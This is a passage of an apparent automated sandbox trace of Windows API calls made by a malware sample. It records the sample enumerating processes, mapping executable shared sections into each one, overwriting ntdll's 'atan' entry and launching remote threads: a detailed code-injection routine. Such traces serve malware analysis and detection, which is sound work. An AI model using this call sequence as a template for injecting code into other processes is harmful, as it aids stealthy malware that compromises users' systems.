AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.438] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0167.438] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.438] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0167.438] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0xe0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0167.445] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0167.445] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0xf0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0167.445] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0167.446] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0167.446] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0167.446] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0167.446] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0167.446] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0167.446] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0167.446] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0167.446] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0167.446] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0167.447] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0167.447] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0167.447] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0167.447] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0167.447] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0167.447] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0167.447] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0167.447] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0167.447] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0167.448] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0167.448] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0167.448] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0167.448] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf00e0000) returned 0x881f0 [0167.448] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0167.449] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0167.449] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0167.449] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0167.449] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0167.449] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0167.449] GetLastError () returned 0x0 [0167.449] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0167.449] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0167.449] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0167.450] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0167.450] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0167.451] CloseHandle (hObject=0xfc) returned 1 [0167.451] Sleep (dwMilliseconds=0x1f4) [0168.161] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0168.162] CloseHandle (hObject=0xf8) returned 1 [0168.162] CloseHandle (hObject=0xf4) returned 1 [0168.162] CloseHandle (hObject=0xf0) returned 1 [0168.162] CloseHandle (hObject=0xec) returned 1 [0168.162] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0168.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0168.163] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0168.163] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0168.163] CloseHandle (hObject=0xec) returned 1 [0168.163] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0168.163] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0168.163] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0168.163] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.163] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.163] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.163] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0168.163] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.163] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0168.163] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x70000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0168.167] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0168.167] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0168.168] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0168.168] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0168.168] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0168.168] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0168.168] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0168.168] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0168.168] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0168.168] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0168.169] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0168.169] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0168.169] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0168.169] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0168.169] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0168.169] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0168.169] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0168.169] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0168.169] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0168.169] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0168.169] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0168.170] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0168.170] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0168.170] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0168.170] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf0070000) returned 0x881f0 [0168.170] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0168.171] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0168.171] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0168.171] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0168.171] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0168.171] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0168.171] GetLastError () returned 0x0 [0168.171] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0168.171] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0168.171] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0168.171] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0168.172] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0168.173] CloseHandle (hObject=0xfc) returned 1 [0168.173] Sleep (dwMilliseconds=0x1f4) [0168.771] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0168.772] CloseHandle (hObject=0xf8) returned 1 [0168.772] CloseHandle (hObject=0xf4) returned 1 [0168.773] CloseHandle (hObject=0xf0) returned 1 [0168.773] CloseHandle (hObject=0xec) returned 1 [0168.773] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0168.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0168.774] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0168.774] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0168.774] CloseHandle (hObject=0xec) returned 1 [0168.774] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0168.774] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0168.774] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0168.774] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.774] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0168.774] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.774] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0168.774] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.774] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0168.774] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x1c0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0168.781] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0168.781] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x1d0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0168.781] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0168.781] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0168.782] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0168.782] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0168.782] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0168.782] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0168.782] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0168.782] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0168.782] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0168.783] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0168.783] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0168.783] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0168.783] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0168.783] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0168.783] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0168.783] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0168.783] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0168.783] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0168.783] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0168.784] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0168.784] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0168.784] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0168.784] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf01c0000) returned 0x881f0 [0168.784] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0168.785] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0168.785] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0168.786] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0168.786] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0168.792] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0168.792] GetLastError () returned 0x0 [0168.792] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0168.792] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0168.792] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0168.792] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0168.793] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0168.794] CloseHandle (hObject=0xfc) returned 1 [0168.794] Sleep (dwMilliseconds=0x1f4) [0169.409] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0169.410] CloseHandle (hObject=0xf8) returned 1 [0169.410] CloseHandle (hObject=0xf4) returned 1 [0169.410] CloseHandle (hObject=0xf0) returned 1 [0169.410] CloseHandle (hObject=0xec) returned 1 [0169.410] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0169.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0169.411] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0169.411] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0169.411] CloseHandle (hObject=0xec) returned 1 [0169.411] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0169.411] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0169.411] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0169.411] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.411] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0169.411] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.411] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0169.411] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.411] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0169.411] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x160000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0169.416] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0169.417] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x170000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0169.417] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0169.417] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0169.417] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0169.417] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0169.417] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0169.417] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0169.417] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0169.418] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0169.418] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0169.418] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0169.418] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0169.418] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0169.418] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0169.418] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0169.418] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0169.418] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0169.418] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0169.419] GetProcAddress (hModule=0x74f40000, 